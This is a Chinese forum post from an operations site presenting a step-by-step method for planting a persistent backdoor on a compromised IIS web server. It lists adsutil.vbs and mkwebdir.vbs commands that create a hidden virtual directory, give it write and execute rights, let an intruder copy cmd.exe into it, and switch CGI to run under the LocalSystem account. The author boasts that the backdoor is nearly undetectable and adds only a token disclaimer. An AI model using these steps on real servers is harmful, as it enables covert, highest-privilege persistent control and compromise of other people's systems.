设为首页 收藏本站
查看: 2547|回复: 0

[经验分享] IIS永远的后门

[复制链接]

尚未签到

发表于 2018-12-11 09:11:10 | 显示全部楼层 |阅读模式
 IIS是比较流行的www服务器,设置不当漏洞就很多。***iis服务器后留下后门,以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听,比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。不过一个比较防范严密的www站点(他们的管理员吃了苦头后)一般通过防火墙对端口进行限制,这样除了管理员开的端口外,其他端口就不能连接了。但是80端口是不可能关闭的(如果管理员没有吃错药)。那么我们可以通过在80端口留后门,来开启永远的后门。  当IIS启动CGI应用程序时,缺省用CreateProcessAsUser API来创建该CGI的新Process,该程序的安全上下文就由启动该CGI的用户决定。一般匿名用户都映射到IUSR_computername这个账号,当然可以由管理员改为其他的用户。或者由浏览器提供一个合法的用户。两者的用户的权限都是比较低,可能都属于guest组的成员。其实我们可以修改iis开启CGI的方式,来提高权限。我们来看iis主进程本身是运行在localsystem账号下的,所以我们就可以得到最高localsystem的权限。
  ***web服务器后,一般都可以绑定一个cmd到一个端口来远程控制该服务器。这时可以有GUI的远程控制,比如3389,或者类telnet text方式的控制,比如rnc。nc肯定是可以用的,其实这也足够了。
  1. telnet到服务器
  2. cscript.exe adsutil.vbs enum w3svc/1/root
  KeyType : (STRING) "IIsWebVirtualDir"
  AppRoot : (STRING) "/LM/W3SVC/1/ROOT"
  AppFriendlyName : (STRING) "默认应用程序"
  AppIsolated : (INTEGER) 2
  Acce***ead : (BOOLEAN) True
  AccessWrite : (BOOLEAN) False
  AccessExecute : (BOOLEAN) False
  AccessScript : (BOOLEAN) True
  AccessSource : (BOOLEAN) False
  AccessNoRemoteRead : (BOOLEAN) False
  AccessNoRemoteWrite : (BOOLEAN) False
  AccessNoRemoteExecute : (BOOLEAN) False
  AccessNoRemoteScript : (BOOLEAN) False
  HttpErrors : (LIST) (32 Items)
  "400,*,FILE,C:\WINNT\help\iisHelp\common\400.htm"
  "401,1,FILE,C:\WINNT\help\iisHelp\common\401-1.htm"
  "401,2,FILE,C:\WINNT\help\iisHelp\common\401-2.htm"
  "401,3,FILE,C:\WINNT\help\iisHelp\common\401-3.htm"
  "401,4,FILE,C:\WINNT\help\iisHelp\common\401-4.htm"
  "401,5,FILE,C:\WINNT\help\iisHelp\common\401-5.htm"
  "403,1,FILE,C:\WINNT\help\iisHelp\common\403-1.htm"
  "403,2,FILE,C:\WINNT\help\iisHelp\common\403-2.htm"
  "403,3,FILE,C:\WINNT\help\iisHelp\common\403-3.htm"
  "403,4,FILE,C:\WINNT\help\iisHelp\common\403-4.htm"
  "403,5,FILE,C:\WINNT\help\iisHelp\common\403-5.htm"
  "403,6,FILE,C:\WINNT\help\iisHelp\common\403-6.htm"
  "403,7,FILE,C:\WINNT\help\iisHelp\common\403-7.htm"
  "403,8,FILE,C:\WINNT\help\iisHelp\common\403-8.htm"
  "403,9,FILE,C:\WINNT\help\iisHelp\common\403-9.htm"
  "403,10,FILE,C:\WINNT\help\iisHelp\common\403-10.htm"
  "403,11,FILE,C:\WINNT\help\iisHelp\common\403-11.htm"
  "403,12,FILE,C:\WINNT\help\iisHelp\common\403-12.htm"
  "403,13,FILE,C:\WINNT\help\iisHelp\common\403-13.htm"
  "403,15,FILE,C:\WINNT\help\iisHelp\common\403-15.htm"
  "403,16,FILE,C:\WINNT\help\iisHelp\common\403-16.htm"
  "403,17,FILE,C:\WINNT\help\iisHelp\common\403-17.htm"
  "404,*,FILE,C:\WINNT\help\iisHelp\common\404b.htm"
  "405,*,FILE,C:\WINNT\help\iisHelp\common\405.htm"
  "406,*,FILE,C:\WINNT\help\iisHelp\common\406.htm"
  "407,*,FILE,C:\WINNT\help\iisHelp\common\407.htm"
  "412,*,FILE,C:\WINNT\help\iisHelp\common\412.htm"
  "414,*,FILE,C:\WINNT\help\iisHelp\common\414.htm"
  "500,12,FILE,C:\WINNT\help\iisHelp\common\500-12.htm"
  "500,13,FILE,C:\WINNT\help\iisHelp\common\500-13.htm"
  "500,15,FILE,C:\WINNT\help\iisHelp\common\500-15.htm"
  "500,100,URL,/iisHelp/common/500-100.asp"
  FrontPageWeb : (BOOLEAN) True
  Path : (STRING) "c:\inetpub\wwwroot"
  AccessFlags : (INTEGER) 513
  [/w3svc/1/root/localstart.asp]
  [/w3svc/1/root/_vti_pvt]
  [/w3svc/1/root/_vti_log]
  [/w3svc/1/root/_private]
  [/w3svc/1/root/_vti_txt]
  [/w3svc/1/root/_vti_script]
  [/w3svc/1/root/_vti_cnf]
  [/w3svc/1/root/_vti_bin]
  不要告诉我你不知道上面的输出是什么!!!!
  现在我们心里已经有底了,是不是!呵呵 管理员要倒霉了
  3. mkdir c:\inetpub\wwwroot\dir1
  4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:\inetpub\wwwroot\dir1"
  这样就建好了一个虚目录:Virtual Dir1
  你可以用 1 的命令看一下
  5. 接下来要改变一下Virtual Dir1的属性为execute
  cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s:
  cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s:
  现在你已经可以upload 内容到该目录,并且可以运行。你也可以把cmd.exe net.exe直接拷贝到虚拟目录的磁盘目录中。
  6. 以下命令通过修改iis metabase 来迫使iis以本身的安全环境来创建新的CGI process
  Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false
  注释:cscript windows script host.
  adsutil.vbs windows iis administration script
  后面是 iis metabase path
  这样的后门几乎是无法查出来的,除非把所有的虚目录察看一遍(如果管理员写好了遗书,那他就去查吧)
  大家不可以用来做非法的***,一切后果自负


运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-649958-1-1.html 上篇帖子: IIS中使用PHP的SESSION的一个奇怪现象 下篇帖子: IIS监控--自动重启脚本工具
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表